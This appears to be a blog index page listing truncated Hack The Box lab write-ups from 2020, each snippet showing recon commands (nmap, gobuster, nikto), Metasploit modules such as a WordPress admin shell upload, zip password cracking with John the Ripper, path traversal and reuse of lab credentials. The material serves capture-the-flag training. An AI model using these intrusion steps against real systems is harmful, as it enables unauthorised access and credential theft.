$sudo nmap -A -T4 -p- 10.10.10.4 Open ports detected: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Based on the detected ports, we have SMB here. $ msfconsole msf5 > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > options msf5 auxiliary(scanner/smb/smb_version) > run Which smb version do we have? Not sure yet… $nmap -p 139 –script smb-protocols 10.10.10.4 -Pn $nmap -p445 –script smb-protocols 10.10.10.4 -Pn According
junio 22, 2020
HTB Lame
$nmap -T4 -p- -A 10.10.10.3 -Pn Open ports detected: 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) $ftp 10.10.10.3 No files are detected. $ssh 10.10.10.3 $msfconsole Install Searchsploit $sudo apt update && sudo apt -y install exploitdb$searchsploit
junio 15, 2020
HTB Starting Point – Base
$./ennumeration.sh Ports detected:22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) $gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirb/big.txt Interesting items found: /_uploaded and /login Access to http://10.10.10.48 http://10.10.10.48/login/login.php The login folder can be listed (Due to a misconfiguration of the webserver) Foothold Download all three files to analyze them. login.php.swp is a binary file. $ls -la $file login.php.swp As it is described, login.php.swp
junio 9, 2020
HTB Starting Point – Guard
$./portScan.sh Ssh port is open. Let’s try the last ssh user we obtained. $ssh -i id_rsa daniel@10.10.10.50 The SSH login gives us access to a restricted shell, where the commands like find, cat and python are disabled. We are unable to read user.txt from this shell. Man command can be used to spawn a bash shell. Once the command opens the manual, we can enter the following command to spawn a
junio 8, 2020
HTB Starting Point – Markup
$./ennumeration.sh Open ports: 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) 443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) $gobuster dir -u http://10.10.10.49 -w /usr/share/wordlists/dirb/common.txt Apache service is running. Let’s try to access the site. Access to http://10.10.10.49 In the previous machine, we found credentials stored in an SQL dump. Let’s try to reuse them, to log into the application. The
junio 5, 2020
HTB Starting Point – Included
$./ennumeration.sh Open ports detected:80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Access to: http://10.10.10.55Url redirection to http://10.10.10.55/?file=index.php Use Owasp-Zap to scan this site: This machine is vulnerable to a File Inclusion Path Traversal attack. According to the application description: The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a
mayo 28, 2020
HTB Starting Point – Pathfinder
$./ennumeration.sh Open ports detected: WinRM 2.0 (Microsoft Windows Remote Management) uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default. Using the credentials we obtained in a previous machine; sandra:Password1234!, we can attempt to enumerate Active Directory. We can achieve this using BloodHound. There is a python bloodhound ingester, which can be found here. We can attempt to enumerate Active Directory. Try using old machine credentials… BloodHound is a single
mayo 24, 2020
HTB Starting point – Shield
$ ./portScan.sh Port 80 is open (Microsoft IIS running) Let’s try to see what’s inside… $ gobuster dir -u http://10.10.10.29/wordpress-w /usr/share/wordlists/dirb/common.txt There is a WordPress instance. http://10.10.10.29/wordpress/ Access to: http://10.10.10.29/wordpress/wp-login.php Following the last machine’s general rule (let’s try old credentials): admin/P@s5w0rd! will work fine. Access to the WordPress Control Panel. Let’s use a wp_admin_shell_upload Metasploit exploit to obtain a functional shell. $ msfconsolemsf5 > use exploit/unix/webapp/wp_admin_shell_upload What do we need to use this exploit?
mayo 14, 2020
HTB Starting Point – Vaccine
kali@kali:~/ctf-tools$ ./portScan.sh Remember we found a ftp user in the last machine Try ftpuser / mc@F1l3ZilL4 and we’ll access to this ftp kali@kali:~/ctf-tools$ ftp 10.10.10.46 ftp> dir ftp> get backup.zip This file is password protected kali@kali:~/htb/vaccine$ sudo zip2john backup.zip > hash zip2john processes input ZIP files into a format to be used with John the Ripper kali@kali:~/htb/vaccine$ sudo john hash –fork=4 –wordlist=»/opt/rockyou.txt» Different files are found inside the zip file. Open
mayo 6, 2020
HTB Starting point – Oopsie
ruben@kali:~/htb/oopsie$ sudo nmap -T4 -p- -A 10.10.10.28 We have port 80 open with apache. ruben@kali:~/htb/oopsie$ sudo nikto -h http://10.10.10.28 According to this result, we have a login site: /cdn-cgi/login/ ruben@kali:~/htb/oopsie$ gobuster dir -u http://10.10.10.28 -w /usr/share/wordlists/dirb/common.txt -e There is an upload directory. Access to: http://10.10.10.28/cdn-cgi/login Test credentials from the last machine: admin/MEGACORP_4dm1n!! The upload section is restricted to super admin. From the accounts section using BurpSuite: We have a cookie with